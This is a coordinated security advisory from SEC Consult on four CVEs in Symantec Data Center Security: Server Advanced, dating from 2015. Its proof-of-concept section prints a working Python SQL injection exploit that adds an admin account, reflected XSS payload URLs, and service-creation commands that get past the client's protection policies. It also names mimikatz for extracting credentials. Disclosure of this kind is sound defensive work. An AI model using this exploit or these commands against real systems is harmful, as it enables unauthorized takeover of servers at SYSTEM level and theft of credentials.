Multiple critical vulnerabilities in Symantec Data Center Security: Server Advanced

SEC Consult Vulnerability Lab Security Advisory < 20150122-0 >

=======================================================================

title: Multiple critical vulnerabilities

products: Symantec Data Center Security: Server Advanced (SDCS:SA)

Symantec Critical System Protection (SCSP)

vulnerable version: see: Vulnerable / tested versions

fixed version: SCSP 5.2.9 MP6, SDCS:SA 6.0 MP1 - not all

vulnerabilities were fixed, but mitigations exist

impact: Critical

CVE number: CVE-2014-7289, CVE-2014-9224, CVE-2014-9225, CVE-2014-9226

homepage: www.symantec.com

found: 2014-09-19

by: Stefan Viehböck

SEC Consult Vulnerability Lab

www.sec-consult.com

=======================================================================

Vendor description:

-------------------

"Symantec Data Center Security: Server Advanced v6.0 (DCS: Server Advanced)

extends the Data Center Security: Server solution beyond agentless threat

protections by incorporating technologies previous known as Critical System

Protection. Data Center Security: Server Advanced provides granular, policy-

based controls with a low impact in-guest agent to monitor and protect numerous

physical and virtual server environments. Through a combination of technologies

including application-centric controls including protected white listing,

sandboxing using least privilege access controls, host-based intrusion detection

(HIDS) and prevention (HIPS), and real-time file integrity monitoring (FIM),

organizations can proactively safeguard their heterogeneous server environments

and the information they contain from zero-day and targeted attacks, and fulfill

their compliance mandates across critical systems. Click here for more info"

Source:

www.symantec.com/connect/forums/announcing-data-center-security-server-server-advanced-products

 

Business recommendation:

------------------------

Attackers are able to completely compromise the SDCS:SA Server as they can gain

access at the system and database level. Furthermore attackers can manage all

clients and their policies.

SDCS:SA Server can be used as an entry point into the target infrastructure

(lateral movement, privilege escalation).

Furthermore the SDCS:SA Client protections can be bypassed in several ways.

It is highly recommended by SEC Consult not to use this software until a

thorough security review (SDCS:SA Server, SDCS:SA Client Policies) has been

performed by security professionals and all identified issues have been

resolved.

Note: SDCS:SA was replaced by SCSP. In this document the name SDCS:SA is used.

 

Vulnerability overview/description:

-----------------------------------

1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)

Due to insufficient input validation, the application allows the injection

of direct SQL commands. By exploiting the vulnerability, an attacker gains

access (read/write) to all records stored in the database as arbitrary SQL

statements can be executed.

Furthermore the application design enables an attacker to gain code execution

as SYSTEM (highest privilege Windows user) on the server by exploiting this

vulnerability.

No prior authentication is needed to exploit this vulnerability.

Affected script:

https:// <host>:4443/sis-ui/authenticate

 

2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)

The applications suffers from a reflected cross-site scripting vulnerability,

which allows an attacker to steal other users' sessions, to impersonate other

users and to gain unauthorized access to the admin interface.

Affected scripts:

https:// <host>:8081/webui/Khaki_docs/SSO-Error.jsp

https:// <host>:8081/webui/admin/WCUnsupportedClass.jsp

 

3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)

A script discloses internal information about the application on the server

without prior authentication. This information includes file paths on the

webserver, version information (OS, Java) and is accessible without prior

authentication.

Affected script:

https:// <host>:8081/webui/admin/environment.jsp

 

4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)

(CVE-2014-9226)

Several bypasses were discovered. These require Windows Administrator

permissions. This requirement is usually met in SDCS:SA deployments.

Note: SEC Consult did not check whether the mitigations provided by Symantec do

in fact sufficiently mitigate these vulnerabilities!

- Persistent code execution via Windows Services

The default Symantec policy rules can be bypassed in order to get persistent

arbitrary code execution.

- Remote code execution via RPC

The default Symantec policy rules can be bypassed in order to get persistent

arbitrary code execution. In addition to that "psexec-style" remote code

execution via SMB is possible as well.

- Policy bypass: Extraction of Windows passwords/hashes

The default Symantec policy rules do not prevent attackers from extracting

the Windows passwords/password hashes from the System.

- Privilege elevation via Windows Installer (msiexec.exe)

The restrictions imposed by the default policies can be bypassed entirely by

exploiting incorrect assumptions made in the policy regarding the Windows

Installer (msiexec.exe).

- Privilege elevation/code execution via Windows Management Instrumentation

(.mof files)

The restrictions imposed by default policies can be bypassed partially by

exploiting incorrect assumptions made in the policy regarding the Windows

Management Instrumentation. The policy does not take intended OS functionality

to execute code into account.

Proof of concept:

-----------------

1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)

The servlet accessible via /sis-ui/authenticate (TCP port 4443, HTTPS) is

vulnerable to SQL injection. By sending a specially crafted HTTP request,

arbitrary SQL statements can be executed.

In a proof of concept exploit, SQL statements to add a new SDCS:SA user with

admin privileges (username: secconsult, password: PASSWORD123!) were executed.

These statements are:

INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult', 
'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', 
'', '', '', '', '', '', '', '', NULL, 'SECCONSULT', '2014-09-12 07:13:09', '2014-09-12 07:13:23', '1', '0', '0', 
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1);

The code used to exploit the SQL injection vulnerability is listed below:

import httplib
def send_request(host,data):
	params = data
	headers = {"AppFire-Format-Version": "1.0",
	           "AppFire-Charset": "UTF-16LE",
	           "Content-Type":"application/x-appfire",
	           "User-Agent":"Java/1.7.0_45",
	           }
	conn = httplib.HTTPSConnection(host)
	conn.request("POST", "/sis-ui/authenticate", params, headers)
	response = conn.getresponse()
	data=response.read()
	conn.close()	
	return response,data

header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '', '', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12 07:13:23', '1', '0', '0', 'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto='); -- '' " # add user to USR table
#data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1); -- " # add user to admin group
data+="\r\nan=Symantec Data Center Security Server 6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
data = data.encode('utf-16le')

eof_flag="\nEOF_FLAG\n"
header = header %(len(data))
payload=header+data+eof_flag

response,data = send_request("<host>:4443",payload)

print data.decode('utf-16le')
print response.status

 

As the application users act as Tomcat administrators, an attacker can login

into the Tomcat manager as well. The Tomcat manager is available by default

via TCP port 8081 HTTPS.

The Tomcat Web Application Manager can be used to deploy new .war-files

containing attacker-controlled Java code. This allows an attacker to execute

arbitrary commands on the operating system with the permissions/user of the

"Symantec Data Center Security Server Manager" service (SISManager) which are

SYSTEM.

 

2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)

At least the following URLs are vulnerable to XSS:

https:// example.com:8081/webui/Khaki_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script>

https:// example.com:8081/webui/admin/WCUnsupportedClass.jsp?classname=<script>alert('xss')</script>

 

3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)

The following URLs discloses internal information:

https:// example.com:8081/webui/admin/environment.jsp

 

4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)

(CVE-2014-9226)

- Persistent code execution via Windows Services

Windows Service binaries can have file extensions other than ".exe". This

allows an attacker to execute arbitrary files and enables automatic execution

of malicious code at OS boot.

- Remote code execution via RPC

Existing tools like "psexec" or Metasploit (/exploit/windows/smb/psexec) can

be modified to write files not ending with ".exe" on the target system.

- Policy bypass: Extraction of Windows passwords/hashes

The tool "mimikatz" can be used to extract Windows credentials.

- Privilege elevation via Windows Installer (msiexec.exe)

msiexec.exe is trusted "safe privileges" when started as a service (usually

"Windows Installer" parameter "/V"). This can be abused by creating a service

that starts msiexec.exe with the parameters "/quiet", "/i" and a path to a valid

.msi file. Upon service start the .msi file is executed with "safe privileges"

privileges and not subject to any SDCS:SA Client checks.

sc create evil_service binpath= "c:\windows\System32\msiexec.exe /quiet /i c:\temp\evil_msi" type= own start= auto error= ignore

net start evil_service

- Privilege elevation/code execution via Windows Management Instrumentation

(.mof files)

On old Windows versions .mof files placed in "%SystemRoot%\System32\wbem\mof\"

are automatically compiled/executed. These trigger arbitrary code execution.

The code is executed with "def_winsvcs_ps" permissions.

 

Vulnerable / tested versions:

-----------------------------

The vulnerabilities have been verified to exist in Symantec Data Center

Security: Server Advanced version 6.0, which was the most recent version at

the time of discovery.

However other versions (SCSP 5.2.9) are affected by the vulnerabilities as

well. See the vendor information in the Solution section.

 

Vendor contact timeline:

------------------------

2014-10-20: Sending advisory and proof of concept exploit via encrypted

channel.

2014-10-20: Vendor acknowledges receipt of advisory.

2014-11-18: Requesting status update.

2014-11-18: Vendor responds and informs about an advisory in December,

version containing fixes in February.

2014-12-04: Vendor informs about delays in releasing fixes/mitigations,

target release date mid-January.

2015-01-08: Vendor confirms release date for fixes/mitigations (2015-01-17).

2015-01-17: Vendor releases fixes for SCSP.

2015-01-19: Vendor releases advisory and mitigations for SCSP/

2015-01-22: SEC Consult releases coordinated security advisory.

 

Solution:

---------

Update to the most recent version of SCSP (5.2.9 MP6) or SDCS:SA (6.0 MP1).

Not all vulnerabilities are fixed by this update! However, Symantec has

provided mitigations for these issues:

More information can be found at:

www.symantec.com/security_response/securityupdates/detail.jsp

www.symantec.com/business/support/index

www.symantec.com/business/support/index

 

Workaround:

-----------

See solution.

 

Advisory URL:

-------------

www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult

Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

Headquarter:

Mooslackengasse 17, 1190 Vienna, Austria

Phone: +43 1 8903043 0

Fax: +43 1 8903043 15

Mail: research at sec-consult dot com

Web: www.sec-consult.com

Blog: blog.sec-consult.com

Twitter: twitter.com/sec_consult

Interested to work with the experts of SEC Consult?

Write to career@sec-consult.com

EOF Stefan Viehböck / @2015